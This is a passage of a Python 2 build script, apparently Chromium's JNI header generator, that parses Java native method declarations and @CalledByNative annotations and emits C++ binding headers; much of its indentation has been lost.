while param[-2:] == '[]':
prefix += '['
param = param[:-2]
# Generic?
if '<' in param:
param = param[:param.index('<')]
if param in pod_param_map:
return prefix + pod_param_map[param]
if '/' in param:
# Coming from javap, use the fully qualified param directly.
return prefix + 'L' + JniParams.RemapClassName(param) + ';'
for qualified_name in (object_param_list +
[JniParams._fully_qualified_class] +
JniParams._inner_classes):
if (qualified_name.endswith('/' + param) or
qualified_name.endswith('$' + param.replace('.', '$')) or
qualified_name == 'L' + param):
return prefix + JniParams.RemapClassName(qualified_name) + ';'
    # Is it from an import? (e.g. referencing Class from import pkg.Class;
# note that referencing an inner class Inner from import pkg.Class.Inner
# is not supported).
for qualified_name in JniParams._imports:
if qualified_name.endswith('/' + param):
# Ensure it's not an inner class.
components = qualified_name.split('/')
if len(components) > 2 and components[-2][0].isupper():
raise SyntaxError('Inner class (%s) can not be imported '
'and used by JNI (%s). Please import the outer '
'class and use Outer.Inner instead.' %
(qualified_name, param))
return prefix + JniParams.RemapClassName(qualified_name) + ';'
# Is it an inner class from an outer class import? (e.g. referencing
# Class.Inner from import pkg.Class).
if '.' in param:
components = param.split('.')
outer = '/'.join(components[:-1])
inner = components[-1]
for qualified_name in JniParams._imports:
if qualified_name.endswith('/' + outer):
return (prefix + JniParams.RemapClassName(qualified_name) +
'$' + inner + ';')
# Type not found, falling back to same package as this class.
return (prefix + 'L' +
JniParams.RemapClassName(JniParams._package + '/' + param) + ';')
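  # Illustrative JavaToJni conversions (assuming no jarjar remappings are set):
  #   'int'     -> 'I'
  #   'int[][]' -> '[[I'
  #   'String'  -> 'Ljava/lang/String;'
  # Unqualified reference types are resolved via the object list, imports and
  # inner classes above, falling back to the current package.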
@staticmethod
def Signature(params, returns, wrap):
"""Returns the JNI signature for the given datatypes."""
items = ['(']
items += [JniParams.JavaToJni(param.datatype) for param in params]
items += [')']
items += [JniParams.JavaToJni(returns)]
if wrap:
return '\n' + '\n'.join(['"' + item + '"' for item in items])
else:
return '"' + ''.join(items) + '"'
@staticmethod
def Parse(params):
"""Parses the params into a list of Param objects."""
if not params:
return []
ret = []
for p in [p.strip() for p in params.split(',')]:
items = p.split(' ')
if 'final' in items:
items.remove('final')
param = Param(
datatype=items[0],
name=(items[1] if len(items) > 1 else 'p%s' % len(ret)),
)
ret += [param]
return ret
@staticmethod
def RemapClassName(class_name):
"""Remaps class names using the jarjar mapping table."""
for old, new in JniParams._remappings:
if old in class_name:
return class_name.replace(old, new, 1)
return class_name
@staticmethod
def SetJarJarMappings(mappings):
"""Parse jarjar mappings from a string."""
JniParams._remappings = []
for line in mappings.splitlines():
keyword, src, dest = line.split()
if keyword != 'rule':
continue
assert src.endswith('.**')
src = src[:-2].replace('.', '/')
dest = dest.replace('.', '/')
if dest.endswith('@0'):
JniParams._remappings.append((src, dest[:-2] + src))
else:
assert dest.endswith('@1')
JniParams._remappings.append((src, dest[:-2]))
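  # Illustrative jarjar remapping: a rule line such as
  #   rule org.example.**  org.shiny.@1
  # is recorded by SetJarJarMappings() as ('org/example/', 'org/shiny/'), so
  # RemapClassName('org/example/Foo') returns 'org/shiny/Foo'.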
def ExtractJNINamespace(contents):
re_jni_namespace = re.compile('.*?@JNINamespace\("(.*?)"\)')
m = re.findall(re_jni_namespace, contents)
if not m:
return ''
return m[0]
def ExtractFullyQualifiedJavaClassName(java_file_name, contents):
re_package = re.compile('.*?package (.*?);')
matches = re.findall(re_package, contents)
if not matches:
raise SyntaxError('Unable to find "package" line in %s' % java_file_name)
return (matches[0].replace('.', '/') + '/' +
os.path.splitext(os.path.basename(java_file_name))[0])
def ExtractNatives(contents, ptr_type):
"""Returns a list of dict containing information about a native method."""
contents = contents.replace('\n', '')
natives = []
re_native = re.compile(r'(@NativeClassQualifiedName'
'\(\"(?P<native_class_name>.*?)\"\))?\s*'
'(@NativeCall(\(\"(?P<java_class_name>.*?)\"\)))?\s*'
'(?P<qualifiers>\w+\s\w+|\w+|\s+)\s*?native '
'(?P<return_type>\S*?) '
'(?P<name>\w+?)\((?P<params>.*?)\);')
for match in re.finditer(re_native, contents):
native = NativeMethod(
static='static' in match.group('qualifiers'),
java_class_name=match.group('java_class_name'),
native_class_name=match.group('native_class_name'),
return_type=match.group('return_type'),
name=match.group('name').replace('native', ''),
params=JniParams.Parse(match.group('params')),
ptr_type=ptr_type)
natives += [native]
return natives
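# Illustrative input for ExtractNatives: a Java declaration such as
#   private static native int nativeAddTwo(int a);
# yields a NativeMethod with static=True, return_type='int', name='AddTwo' and
# one int param; because its first param is not a 'native...' pointer of
# ptr_type, its type is 'function' rather than 'method'.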
def GetStaticCastForReturnType(return_type):
type_map = { 'String' : 'jstring',
'java/lang/String' : 'jstring',
'boolean[]': 'jbooleanArray',
'byte[]': 'jbyteArray',
'char[]': 'jcharArray',
'short[]': 'jshortArray',
'int[]': 'jintArray',
'long[]': 'jlongArray',
'double[]': 'jdoubleArray' }
ret = type_map.get(return_type, None)
if ret:
return ret
if return_type.endswith('[]'):
return 'jobjectArray'
return None
def GetEnvCall(is_constructor, is_static, return_type):
"""Maps the types availabe via env->Call__Method."""
if is_constructor:
return 'NewObject'
env_call_map = {'boolean': 'Boolean',
'byte': 'Byte',
'char': 'Char',
'short': 'Short',
'int': 'Int',
'long': 'Long',
'float': 'Float',
'void': 'Void',
'double': 'Double',
'Object': 'Object',
}
call = env_call_map.get(return_type, 'Object')
if is_static:
call = 'Static' + call
return 'Call' + call + 'Method'
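# Illustrative GetEnvCall results: a static method returning int maps to
# 'CallStaticIntMethod', an instance method returning an object maps to
# 'CallObjectMethod', and any constructor maps to 'NewObject'.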
def GetMangledParam(datatype):
"""Returns a mangled identifier for the datatype."""
if len(datatype) <= 2:
return datatype.replace('[', 'A')
ret = ''
for i in range(1, len(datatype)):
c = datatype[i]
if c == '[':
ret += 'A'
elif c.isupper() or datatype[i - 1] in ['/', 'L']:
ret += c.upper()
return ret
def GetMangledMethodName(name, params, return_type):
"""Returns a mangled method name for the given signature.
The returned name can be used as a C identifier and will be unique for all
valid overloads of the same method.
Args:
name: string.
params: list of Param.
return_type: string.
Returns:
A mangled name.
"""
mangled_items = []
for datatype in [return_type] + [x.datatype for x in params]:
mangled_items += [GetMangledParam(JniParams.JavaToJni(datatype))]
mangled_name = name + '_'.join(mangled_items)
assert re.match(r'[0-9a-zA-Z_]+', mangled_name)
return mangled_name
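# Illustrative mangling: for a method 'getAt' returning String and taking a
# single int parameter, JavaToJni yields 'Ljava/lang/String;' and 'I', which
# GetMangledParam reduces to 'JLS' and 'I', giving the mangled name
# 'getAtJLS_I'.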
def MangleCalledByNatives(called_by_natives):
"""Mangles all the overloads from the call_by_natives list."""
method_counts = collections.defaultdict(
lambda: collections.defaultdict(lambda: 0))
for called_by_native in called_by_natives:
java_class_name = called_by_native.java_class_name
name = called_by_native.name
method_counts[java_class_name][name] += 1
for called_by_native in called_by_natives:
java_class_name = called_by_native.java_class_name
method_name = called_by_native.name
method_id_var_name = method_name
if method_counts[java_class_name][method_name] > 1:
method_id_var_name = GetMangledMethodName(method_name,
called_by_native.params,
called_by_native.return_type)
called_by_native.method_id_var_name = method_id_var_name
return called_by_natives
# Regex to match the JNI return types that should be included in a
# ScopedJavaLocalRef.
RE_SCOPED_JNI_RETURN_TYPES = re.compile('jobject|jclass|jstring|.*Array')
# Regex to match a string like "@CalledByNative public void foo(int bar)".
RE_CALLED_BY_NATIVE = re.compile(
'@CalledByNative(?P<Unchecked>(Unchecked)*?)(?:\("(?P<annotation>.*)"\))?'
'\s+(?P<prefix>[\w ]*?)'
'\s*(?P<return_type>\S+?)'
'\s+(?P<name>\w+)'
'\s*\((?P<params>[^\)]*)\)')
def ExtractCalledByNatives(contents):
"""Parses all methods annotated with @CalledByNative.
Args:
contents: the contents of the java file.
Returns:
A list of dict with information about the annotated methods.
TODO(bulach): return a CalledByNative object.
Raises:
ParseError: if unable to parse.
"""
called_by_natives = []
for match in re.finditer(RE_CALLED_BY_NATIVE, contents):
called_by_natives += [CalledByNative(
system_class=False,
unchecked='Unchecked' in match.group('Unchecked'),
static='static' in match.group('prefix'),
java_class_name=match.group('annotation') or '',
return_type=match.group('return_type'),
name=match.group('name'),
params=JniParams.Parse(match.group('params')))]
# Check for any @CalledByNative occurrences that weren't matched.
unmatched_lines = re.sub(RE_CALLED_BY_NATIVE, '', contents).split('\n')
for line1, line2 in zip(unmatched_lines, unmatched_lines[1:]):
if '@CalledByNative' in line1:
raise ParseError('could not parse @CalledByNative method signature',
line1, line2)
return MangleCalledByNatives(called_by_natives)
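# Illustrative input for ExtractCalledByNatives: an annotated Java method like
#   @CalledByNative
#   private void onResult(int status) {...}
# yields a CalledByNative with name='onResult', return_type='void' and one int
# param; @CalledByNativeUnchecked sets unchecked=True, and an annotation value
# such as @CalledByNative("Inner") sets java_class_name to 'Inner'.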
class JNIFromJavaP(object):
"""Uses 'javap' to parse a .class file and generate the JNI header file."""
def __init__(self, contents, options):
self.contents = contents
self.namespace = options.namespace
self.fully_qualified_class = re.match(
'.*?(class|interface) (?P<class_name>.*?)( |{)',
contents[1]).group('class_name')
self.fully_qualified_class = self.fully_qualified_class.replace('.', '/')
# Java 7's javap includes type parameters in output, like HashSet<T>. Strip
# away the <...> and use the raw class name that Java 6 would've given us.
self.fully_qualified_class = self.fully_qualified_class.split('<', 1)[0]
JniParams.SetFullyQualifiedClass(self.fully_qualified_class)
self.java_class_name = self.fully_qualified_class.split('/')[-1]
if not self.namespace:
self.namespace = 'JNI_' + self.java_class_name
re_method = re.compile('(?P<prefix>.*?)(?P<return_type>\S+?) (?P<name>\w+?)'
'\((?P<params>.*?)\)')
self.called_by_natives = []
for lineno, content in enumerate(contents[2:], 2):
match = re.match(re_method, content)
if not match:
continue
self.called_by_natives += [CalledByNative(
system_class=True,
unchecked=False,
static='static' in match.group('prefix'),
java_class_name='',
return_type=match.group('return_type').replace('.', '/'),
name=match.group('name'),
params=JniParams.Parse(match.group('params').replace('.', '/')),
signature=JniParams.ParseJavaPSignature(contents[lineno + 1]))]
re_constructor = re.compile('(.*?)public ' +
self.fully_qualified_class.replace('/', '.') +
'\((?P<params>.*?)\)')
for lineno, content in enumerate(contents[2:], 2):
match = re.match(re_constructor, content)
if not match:
continue
self.called_by_natives += [CalledByNative(
system_class=True,
unchecked=False,
static=False,
java_class_name='',
return_type=self.fully_qualified_class,
name='Constructor',
params=JniParams.Parse(match.group('params').replace('.', '/')),
signature=JniParams.ParseJavaPSignature(contents[lineno + 1]),
is_constructor=True)]
self.called_by_natives = MangleCalledByNatives(self.called_by_natives)
self.inl_header_file_generator = InlHeaderFileGenerator(
self.namespace, self.fully_qualified_class, [],
self.called_by_natives, options)
def GetContent(self):
return self.inl_header_file_generator.GetContent()
@staticmethod
def CreateFromClass(class_file, options):
class_name = os.path.splitext(os.path.basename(class_file))[0]
p = subprocess.Popen(args=['javap', '-s', class_name],
cwd=os.path.dirname(class_file),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = p.communicate()
jni_from_javap = JNIFromJavaP(stdout.split('\n'), options)
return jni_from_javap
class JNIFromJavaSource(object):
"""Uses the given java source file to generate the JNI header file."""
def __init__(self, contents, fully_qualified_class, options):
contents = self._RemoveComments(contents)
JniParams.SetFullyQualifiedClass(fully_qualified_class)
JniParams.ExtractImportsAndInnerClasses(contents)
jni_namespace = ExtractJNINamespace(contents)
natives = ExtractNatives(contents, options.ptr_type)
called_by_natives = ExtractCalledByNatives(contents)
if len(natives) == 0 and len(called_by_natives) == 0:
raise SyntaxError('Unable to find any JNI methods for %s.' %
fully_qualified_class)
inl_header_file_generator = InlHeaderFileGenerator(
jni_namespace, fully_qualified_class, natives, called_by_natives,
options)
self.content = inl_header_file_generator.GetContent()
def _RemoveComments(self, contents):
# We need to support both inline and block comments, and we need to handle
# strings that contain '//' or '/*'. Rather than trying to do all that with
# regexps, we just pipe the contents through the C preprocessor. We tell cpp
# the file has already been preprocessed, so it just removes comments and
# doesn't try to parse #include, #pragma etc.
#
# TODO(husky): This is a bit hacky. It would be cleaner to use a real Java
# parser. Maybe we could ditch JNIFromJavaSource and just always use
# JNIFromJavaP; or maybe we could rewrite this script in Java and use APT.
# http://code.google.com/p/chromium/issues/detail?id=138941
p = subprocess.Popen(args=['cpp', '-fpreprocessed'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = p.communicate(contents)
return stdout
def GetContent(self):
return self.content
@staticmethod
def CreateFromFile(java_file_name, options):
contents = file(java_file_name).read()
fully_qualified_class = ExtractFullyQualifiedJavaClassName(java_file_name,
contents)
return JNIFromJavaSource(contents, fully_qualified_class, options)
class InlHeaderFileGenerator(object):
"""Generates an inline header file for JNI integration."""
def __init__(self, namespace, fully_qualified_class, natives,
called_by_natives, options):
self.namespace = namespace
self.fully_qualified_class = fully_qualified_class
self.class_name = self.fully_qualified_class.split('/')[-1]
self.natives = natives
self.called_by_natives = called_by_natives
self.header_guard = fully_qualified_class.replace('/', '_') + '_JNI'
self.script_name = options.script_name
def GetContent(self):
"""Returns the content of the JNI binding file."""
template = Template("""\
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// This file is autogenerated by
// ${SCRIPT_NAME}
// For
// ${FULLY_QUALIFIED_CLASS}
#ifndef ${HEADER_GUARD}
#define ${HEADER_GUARD}
#include <jni.h>
#include "base/android/jni_android.h"
#include "base/android/scoped_java_ref.h"
#include "base/basictypes.h"
#include "base/logging.h"
using base::android::ScopedJavaLocalRef;
// Step 1: forward declarations.
namespace {
$CLASS_PATH_DEFINITIONS
} // namespace
$OPEN_NAMESPACE
$FORWARD_DECLARATIONS
// Step 2: method stubs.
$METHOD_STUBS
// Step 3: RegisterNatives.
static bool RegisterNativesImpl(JNIEnv* env) {
$REGISTER_NATIVES_IMPL
return true;
}
$CLOSE_NAMESPACE
#endif // ${HEADER_GUARD}
""")
values = {
'SCRIPT_NAME': self.script_name,
'FULLY_QUALIFIED_CLASS': self.fully_qualified_class,
'CLASS_PATH_DEFINITIONS': self.GetClassPathDefinitionsString(),
'FORWARD_DECLARATIONS': self.GetForwardDeclarationsString(),
'METHOD_STUBS': self.GetMethodStubsString(),
'OPEN_NAMESPACE': self.GetOpenNamespaceString(),
'REGISTER_NATIVES_IMPL': self.GetRegisterNativesImplString(),
'CLOSE_NAMESPACE': self.GetCloseNamespaceString(),
'HEADER_GUARD': self.header_guard,
}
return WrapOutput(template.substitute(values))
def GetClassPathDefinitionsString(self):
ret = []
ret += [self.GetClassPathDefinitions()]
return '\n'.join(ret)
def GetForwardDeclarationsString(self):
ret = []
for native in self.natives:
if native.type != 'method':
ret += [self.GetForwardDeclaration(native)]
return '\n'.join(ret)
def GetMethodStubsString(self):
ret = []
for native in self.natives:
if native.type == 'method':
ret += [self.GetNativeMethodStub(native)]
for called_by_native in self.called_by_natives:
ret += [self.GetCalledByNativeMethodStub(called_by_native)]
return '\n'.join(ret)
def GetKMethodsString(self, clazz):
ret = []
for native in self.natives:
if (native.java_class_name == clazz or
(not native.java_class_name and clazz == self.class_name)):
ret += [self.GetKMethodArrayEntry(native)]
return '\n'.join(ret)
def GetRegisterNativesImplString(self):
"""Returns the implementation for RegisterNatives."""
template = Template("""\
static const JNINativeMethod kMethods${JAVA_CLASS}[] = {
${KMETHODS}
};
const int kMethods${JAVA_CLASS}Size = arraysize(kMethods${JAVA_CLASS});
if (env->RegisterNatives(g_${JAVA_CLASS}_clazz,
kMethods${JAVA_CLASS},
kMethods${JAVA_CLASS}Size) < 0) {
LOG(ERROR) << "RegisterNatives failed in " << __FILE__;
return false;
}
""")
ret = [self.GetFindClasses()]
all_classes = self.GetUniqueClasses(self.natives)
all_classes[self.class_name] = self.fully_qualified_class
for clazz in all_classes:
kmethods = self.GetKMethodsString(clazz)
if kmethods:
values = {'JAVA_CLASS': clazz,
'KMETHODS': kmethods}
ret += [template.substitute(values)]
if not ret: return ''
return '\n' + '\n'.join(ret)
def GetOpenNamespaceString(self):
if self.namespace:
all_namespaces = ['namespace %s {' % ns
for ns in self.namespace.split('::')]
return '\n'.join(all_namespaces)
return ''
def GetCloseNamespaceString(self):
if self.namespace:
all_namespaces = ['} // namespace %s' % ns
for ns in self.namespace.split('::')]
all_namespaces.reverse()
return '\n'.join(all_namespaces) + '\n'
return ''
def GetJNIFirstParam(self, native):
ret = []
if native.type == 'method':
ret = ['jobject obj']
elif native.type == 'function':
if native.static:
ret = ['jclass clazz']
else:
ret = ['jobject obj']
return ret
def GetParamsInDeclaration(self, native):
"""Returns the params for the stub declaration.
Args:
native: the native dictionary describing the method.
Returns:
A string containing the params.
"""
return ',\n '.join(self.GetJNIFirstParam(native) +
[JavaDataTypeToC(param.datatype) + ' ' +
param.name
for param in native.params])
def GetCalledByNativeParamsInDeclaration(self, called_by_native):
return ',\n '.join([JavaDataTypeToC(param.datatype) + ' ' +
param.name
for param in called_by_native.params])
def GetForwardDeclaration(self, native):
template = Template("""
static ${RETURN} ${NAME}(JNIEnv* env, ${PARAMS});
""")
values = {'RETURN': JavaDataTypeToC(native.return_type),
'NAME': native.name,
'PARAMS': self.GetParamsInDeclaration(native)}
return template.substitute(values)
def GetNativeMethodStub(self, native):
"""Returns stubs for native methods."""
template = Template("""\
static ${RETURN} ${NAME}(JNIEnv* env, ${PARAMS_IN_DECLARATION}) {
DCHECK(${PARAM0_NAME}) << "${NAME}";
${P0_TYPE}* native = reinterpret_cast<${P0_TYPE}*>(${PARAM0_NAME});
return native->${NAME}(env, obj${PARAMS_IN_CALL})${POST_CALL};
}
""")
params_for_call = ', '.join(p.name for p in native.params[1:])
if params_for_call:
params_for_call = ', ' + params_for_call
return_type = JavaDataTypeToC(native.return_type)
if re.match(RE_SCOPED_JNI_RETURN_TYPES, return_type):
scoped_return_type = 'ScopedJavaLocalRef<' + return_type + '>'
post_call = '.Release()'
else:
scoped_return_type = return_type
post_call = ''
values = {
'RETURN': return_type,
'SCOPED_RETURN': scoped_return_type,
'NAME': native.name,
'PARAMS_IN_DECLARATION': self.GetParamsInDeclaration(native),
'PARAM0_NAME': native.params[0].name,
'P0_TYPE': native.p0_type,
'PARAMS_IN_CALL': params_for_call,
'POST_CALL': post_call
}
return template.substitute(values)
def GetCalledByNativeMethodStub(self, called_by_native):
"""Returns a string."""
function_signature_template = Template("""\
static ${RETURN_TYPE} Java_${JAVA_CLASS}_${METHOD_ID_VAR_NAME}(\
JNIEnv* env${FIRST_PARAM_IN_DECLARATION}${PARAMS_IN_DECLARATION})""")
function_header_template = Template("""\
${FUNCTION_SIGNATURE} {""")
function_header_with_unused_template = Template("""\
${FUNCTION_SIGNATURE} __attribute__ ((unused));
${FUNCTION_SIGNATURE} {""")
template = Template("""
static base::subtle::AtomicWord g_${JAVA_CLASS}_${METHOD_ID_VAR_NAME} = 0;
${FUNCTION_HEADER}
/* Must call RegisterNativesImpl() */
DCHECK(g_${JAVA_CLASS}_clazz);
jmethodID method_id =
${GET_METHOD_ID_IMPL}
${RETURN_DECLARATION}
${PRE_CALL}env->${ENV_CALL}(${FIRST_PARAM_IN_CALL},
method_id${PARAMS_IN_CALL})${POST_CALL};
${CHECK_EXCEPTION}
${RETURN_CLAUSE}
}""")
if called_by_native.static or called_by_native.is_constructor:
first_param_in_declaration = ''
first_param_in_call = ('g_%s_clazz' %
(called_by_native.java_class_name or
self.class_name))
else:
first_param_in_declaration = ', jobject obj'
first_param_in_call = 'obj'
params_in_declaration = self.GetCalledByNativeParamsInDeclaration(
called_by_native)
if params_in_declaration:
params_in_declaration = ', ' + params_in_declaration
params_for_call = ', '.join(param.name
for param in called_by_native.params)
if params_for_call:
params_for_call = ', ' + params_for_call
pre_call = ''
post_call = ''
if called_by_native.static_cast:
pre_call = 'static_cast<%s>(' % called_by_native.static_cast
post_call = ')'
check_exception = ''
if not called_by_native.unchecked:
check_exception = 'base::android::CheckException(env);'
return_type = JavaDataTypeToC(called_by_native.return_type)
return_declaration = ''
return_clause = ''
if return_type != 'void':
pre_call = ' ' + pre_call
return_declaration = return_type + ' ret ='
if re.match(RE_SCOPED_JNI_RETURN_TYPES, return_type):
return_type = 'ScopedJavaLocalRef<' + return_type + '>'
return_clause = 'return ' + return_type + '(env, ret);'
else:
return_clause = 'return ret;'
values = {
'JAVA_CLASS': called_by_native.java_class_name or self.class_name,
'METHOD': called_by_native.name,
'RETURN_TYPE': return_type,
'RETURN_DECLARATION': return_declaration,
'RETURN_CLAUSE': return_clause,
'FIRST_PARAM_IN_DECLARATION': first_param_in_declaration,
'PARAMS_IN_DECLARATION': params_in_declaration,
'STATIC': 'Static' if called_by_native.static else '',
'PRE_CALL': pre_call,
'POST_CALL': post_call,
'ENV_CALL': called_by_native.env_call,
'FIRST_PARAM_IN_CALL': first_param_in_call,
'PARAMS_IN_CALL': params_for_call,
'METHOD_ID_VAR_NAME': called_by_native.method_id_var_name,
'CHECK_EXCEPTION': check_exception,
'GET_METHOD_ID_IMPL': self.GetMethodIDImpl(called_by_native)
}
values['FUNCTION_SIGNATURE'] = (
function_signature_template.substitute(values))
if called_by_native.system_class:
values['FUNCTION_HEADER'] = (
function_header_with_unused_template.substitute(values))
else:
values['FUNCTION_HEADER'] = function_header_template.substitute(values)
return template.substitute(values)
def GetKMethodArrayEntry(self, native):
template = Template("""\
{ "native${NAME}", ${JNI_SIGNATURE}, reinterpret_cast<void*>(${NAME}) },""")
values = {'NAME': native.name,
'JNI_SIGNATURE': JniParams.Signature(native.params,
native.return_type,
True)}
return template.substitute(values)
def GetUniqueClasses(self, origin):
ret = {self.class_name: self.fully_qualified_class}
for entry in origin:
class_name = self.class_name
jni_class_path = self.fully_qualified_class
if entry.java_class_name:
class_name = entry.java_class_name
jni_class_path = self.fully_qualified_class + '$' + class_name
ret[class_name] = jni_class_path
return ret
def GetClassPathDefinitions(self):
"""Returns the ClassPath constants."""
ret = []
template = Template("""\
const char k${JAVA_CLASS}ClassPath[] = "${JNI_CLASS_PATH}";""")
native_classes = self.GetUniqueClasses(self.natives)
called_by_native_classes = self.GetUniqueClasses(self.called_by_natives)
all_classes = native_classes
all_classes.update(called_by_native_classes)
for clazz in all_classes:
values = {
'JAVA_CLASS': clazz,
'JNI_CLASS_PATH': JniParams.RemapClassName(all_classes[clazz]),
}
ret += [template.substitute(values)]
    ret += ['']  # Blank line before the jclass declarations below.
for clazz in called_by_native_classes:
template = Template("""\
// Leaking this jclass as we cannot use LazyInstance from some threads.
jclass g_${JAVA_CLASS}_clazz = NULL;""")
values = {
'JAVA_CLASS': clazz,
}
ret += [template.substitute(values)]
return '\n'.join(ret)
def GetFindClasses(self):
"""Returns the imlementation of FindClass for all known classes."""
template = Template("""\
g_${JAVA_CLASS}_clazz = reinterpret_cast<jclass>(env->NewGlobalRef(
base::android::GetClass(env, k${JAVA_CLASS}ClassPath).obj()));""")
ret = []
for clazz in self.GetUniqueClasses(self.called_by_natives):
values = {'JAVA_CLASS': clazz}
ret += [template.substitute(values)]
return '\n'.join(ret)
def GetMethodIDImpl(self, called_by_native):
"""Returns the implementation of GetMethodID."""
template = Template("""\
base::android::MethodID::LazyGet<
base::android::MethodID::TYPE_${STATIC}>(
env, g_${JAVA_CLASS}_clazz,
"${JNI_NAME}",
${JNI_SIGNATURE},
&g_${JAVA_CLASS}_${METHOD_ID_VAR_NAME});
""")
jni_name = called_by_native.name
jni_return_type = called_by_native.return_type
if called_by_native.is_constructor:
jni_name = '<init>'
jni_return_type = 'void'
if called_by_native.signature:
signature = called_by_native.signature
else:
signature = JniParams.Signature(called_by_native.params,
jni_return_type,
True)
values = {
'JAVA_CLASS': called_by_native.java_class_name or self.class_name,
'JNI_NAME': jni_name,
'METHOD_ID_VAR_NAME': called_by_native.method_id_var_name,
'STATIC': 'STATIC' if called_by_native.static else 'INSTANCE',
'JNI_SIGNATURE': signature,
}
return template.substitute(values)
def WrapOutput(output):
ret = []
for line in output.splitlines():
# Do not wrap lines under 80 characters or preprocessor directives.
if len(line) < 80 or line.lstrip()[:1] == '#':
stripped = line.rstrip()
if len(ret) == 0 or len(ret[-1]) or len(stripped):
ret.append(stripped)
else:
first_line_indent = ' ' * (len(line) - len(line.lstrip()))
subsequent_indent = first_line_indent + ' ' * 4
if line.startswith('//'):
subsequent_indent = '//' + subsequent_indent
wrapper = textwrap.TextWrapper(width=80,
subsequent_indent=subsequent_indent,
break_long_words=False)
ret += [wrapped.rstrip() for wrapped in wrapper.wrap(line)]
ret += ['']
return '\n'.join(ret)
def ExtractJarInputFile(jar_file, input_file, out_dir):
"""Extracts input file from jar and returns the filename.
  The input file is extracted to the same directory that the generated jni
  headers will be placed in. This is passed as an argument to the script.
  Args:
    jar_file: the jar file containing the input file to extract.
    input_file: the file to extract from the jar file.
    out_dir: the directory to extract to.
  Returns:
    the name of the extracted input file.
"""
jar_file = zipfile.ZipFile(jar_file)
out_dir = os.path.join(out_dir, os.path.dirname(input_file))
try:
os.makedirs(out_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
extracted_file_name = os.path.join(out_dir, os.path.basename(input_file))
with open(extracted_file_name, 'w') as outfile:
outfile.write(jar_file.read(input_file))
return extracted_file_name
def GenerateJNIHeader(input_file, output_file, options):
try:
if os.path.splitext(input_file)[1] == '.class':
jni_from_javap = JNIFromJavaP.CreateFromClass(input_file, options)
content = jni_from_javap.GetContent()
else:
jni_from_java_source = JNIFromJavaSource.CreateFromFile(
input_file, options)
content = jni_from_java_source.GetContent()
except ParseError, e:
print e
sys.exit(1)
if output_file:
if not os.path.exists(os.path.dirname(os.path.abspath(output_file))):
os.makedirs(os.path.dirname(os.path.abspath(output_file)))
if options.optimize_generation and os.path.exists(output_file):
with file(output_file, 'r') as f:
existing_content = f.read()
if existing_content == content:
return
with file(output_file, 'w') as f:
f.write(content)
else:
    print content
def GetScriptName():
script_components = os.path.abspath(sys.argv[0]).split(os.path.sep)
base_index = 0
for idx, value in enumerate(script_components):
if value == 'base' or value == 'third_party':
base_index = idx
break
return os.sep.join(script_components[base_index:])
def main(argv):
usage = """usage: %prog [OPTIONS]
This script will parse the given Java source code, extract the native method
declarations, and print the header file to stdout (or to a file).
See SampleForTests.java for more details.
"""
option_parser = optparse.OptionParser(usage=usage)
option_parser.add_option('-j', dest='jar_file',
help='Extract the list of input files from'
' a specified jar file.'
' Uses javap to extract the methods from a'
                           ' pre-compiled class. --input_file should point'
' to pre-compiled Java .class files.')
option_parser.add_option('-n', dest='namespace',
help='Uses as a namespace in the generated header,'
' instead of the javap class name.')
option_parser.add_option('--input_file',
help='Single input file name. The output file name '
'will be derived from it. Must be used with '
'--output_dir.')
option_parser.add_option('--output_dir',
help='The output directory. Must be used with '
                           '--input_file.')
option_parser.add_option('--optimize_generation', type="int",
default=0, help='Whether we should optimize JNI '
'generation by not regenerating files if they have '
'not changed.')
option_parser.add_option('--jarjar',
help='Path to optional jarjar rules file.')
option_parser.add_option('--script_name', default=GetScriptName(),
help='The name of this script in the generated '
'header.')
option_parser.add_option('--ptr_type', default='int',
type='choice', choices=['int', 'long'],
help='The type used to represent native pointers in '
'Java code. For 32-bit, use int; '
'for 64-bit, use long.')
options, args = option_parser.parse_args(argv)
if options.jar_file:
input_file = ExtractJarInputFile(options.jar_file, options.input_file,
options.output_dir)
elif options.input_file:
input_file = options.input_file
else:
option_parser.print_help()
print '\nError: Must specify --jar_file or --input_file.'
return 1
output_file = None
if options.output_dir:
root_name = os.path.splitext(os.path.basename(input_file))[0]
output_file = os.path.join(options.output_dir, root_name) + '_jni.h'
if options.jarjar:
with open(options.jarjar) as f:
JniParams.SetJarJarMappings(f.read())
GenerateJNIHeader(input_file, output_file, options)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| bsd-3-clause |